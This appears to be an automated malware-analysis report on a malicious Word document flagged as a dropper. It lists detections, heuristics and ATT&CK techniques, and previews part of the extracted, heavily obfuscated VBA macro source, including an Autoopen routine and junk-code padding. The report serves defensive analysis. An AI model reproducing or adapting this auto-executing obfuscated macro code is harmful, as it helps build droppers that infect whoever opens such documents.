MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and a Shell() call. ClamAV identifies it as 'Doc.Dropper.Agent-6520158-0', suggesting it acts as a dropper. The VBA code is heavily obfuscated, but the presence of the Shell() call indicates an intent to execute external code, likely a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6520158-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6520158-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52132 bytes |
SHA-256: 17a24c0d3297022b89664ca1f41879e192b048d56e4cbec10d51eb4508ea7f44 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sWLpKFSYwjVtsG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MINns(lNZQjH)
Select Case VQZNNu
Case 84311
fEGTd = wUzhZ
kzwEl = Round(6960)
kfSpj = Hex(pTdwkz - ChrW(wthEH))
OSmtZ = GkGXTU
Case 54055
sHfMO = CByte(44016)
otVYP = Log(WarQrz)
End Select
End Sub
Sub oiwmt(dKjvJ)
Select Case HmJpNV
Case 81377
vaYRUJ = jKOHcX
VKJtT = Round(13180)
OEzLzH = Hex(NkivBN - ChrW(OJjRj))
tAVoh = wRzjU
Case 3704
qhVbFX = CByte(3835)
WZkMbJ = Log(GAcbjw)
End Select
Select Case OjJit
Case 21678
NEKtRX = siathK
alcGu = Round(12940)
zDsRm = Hex(TmRbiq - ChrW(IUaSJ))
BORBhC = cnwhYw
Case 8745
OARbf = CByte(63440)
FRzPq = Log(OGLJwI)
End Select
Select Case wiBLP
Case 99984
jokCj = zuUIrd
jIzCS = Round(23527)
OjnXbp = Hex(YfwGMf - ChrW(oRhwj))
tTlCS = DXoiz
Case 86120
EwzBM = CByte(52283)
mYOVCf = Log(lsqSFj)
End Select
End Sub
Sub BuvkF(mbkzz)
Select Case JaUpP
Case 40458
sRVFQ = nURfzQ
JvDEEQ = Round(12922)
EKnRW = Hex(VXQCbz - ChrW(qqjpik))
nUvnh = DOXQl
Case 98210
CoHhn = CByte(88973)
RwBdW = Log(KSFXO)
End Select
Select Case joijO
Case 1016
RlHAzR = ijCjzB
ZBrSSR = Round(27464)
lJACLS = Hex(YEsjDc - ChrW(JvBLu))
iQVYMp = mnRvj
Case 41950
AwAzF = CByte(17588)
IwqSw = Log(zrvRH)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case iPUnb
Case 80672
Mnknw = hFZKvE
lbVSf = Round(10963)
hGvsz = Hex(MrHfLY - ChrW(iwVXK))
UQCajA = AmDuC
Case 15498
boFss = CByte(75764)
lqzuz = Log(zXoFz)
End Select
oUlwzfh (kkwfj + IMuivVnnFOB + rmoao)
Select Case dDCfu
Case 82452
fXnjZE = hiPdzz
uXldJZ = Round(57686)
ASLCk = Hex(wTRdz - ChrW(SjzAYb))
jNWLcq = ifRCl
Case 32898
iXUYXT = CByte(30051)
KwAAVi = Log(akEhZ)
End Select
End Sub
Sub ndHiLU(QCOrjc)
Select Case MccAHk
Case 90787
YLcUm = FjzDr
qtMqL = Round(98599)
VIjIUt = Hex(wzIDZp - ChrW(lFwGr))
KKWRop = zTQmpI
Case 5434
uoCHav = CByte(48022)
YtdBA = Log(nPjUR)
End Select
Select Case KlSTi
Case 37078
ihWORn = qRtwQm
CzXKna = Round(85292)
ACUrjP = Hex(VjdHD - ChrW(aCiMOX))
WWkEi = HovIrt
Case 375
hTtaGM = CByte(65453)
KVIirc = Log(swZCdI)
End Select
Select Case SQMwIU
Case 50447
lODutj = lHLjbL
vvsis = Round(5257)
RqWrD = Hex(dNKEN - ChrW(kjtfz))
MHMRqz = SDVQDd
Case 54537
QUXjD = CByte(80358)
HYzHTG = Log(iBQuvf)
End Select
End Sub
Sub zzzZJk(HwGalz)
Select Case PWzut
Case 57910
oUjdbr = UAIhw
TUYHtF = Round(72228)
bqjiI = Hex(PfRAB - ChrW(vIfPv))
sYnwzs = VAuzrA
Case 77938
zMdDvS = CByte(70754)
ojIjv = Log(KpILKM)
End Select
End Sub
Attribute VB_Name = "MfsntmFVh"
Sub zNIvw(MzQIP)
Select Case MpMtoq
Case 8894
jqcfnj = QBjinH
ITmkO = Round(77957)
LuEwNT = Hex(aAwPQ - ChrW(tJkdIP))
vzkdb = ChtGDc
Case
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.